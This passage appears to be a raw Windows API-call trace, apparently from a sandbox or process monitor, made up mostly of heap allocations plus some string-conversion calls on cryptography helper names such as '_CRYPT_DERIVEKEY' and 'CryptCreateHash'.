[0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0127.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea490 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0127.105] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0127.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0127.105] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0127.106] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0127.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43925a8 [0127.106] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa48 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0127.107] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0127.107] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0127.107] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43924c8 [0127.107] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0127.107] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2670 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0127.108] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0127.109] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0127.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0127.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0127.111] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0127.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8b0 [0127.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0127.111] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0127.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0127.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0127.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0127.111] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0127.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0127.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0127.111] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0127.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0127.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0127.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0127.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0127.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0127.111] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0127.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0127.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0127.111] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0127.111] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0127.112] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0127.112] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0127.112] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0127.112] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0127.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0127.113] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca958 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0127.113] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0127.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0127.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0127.114] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0127.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0127.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0127.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0127.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0127.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0127.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0127.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0127.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0127.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0127.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0127.116] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca9d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 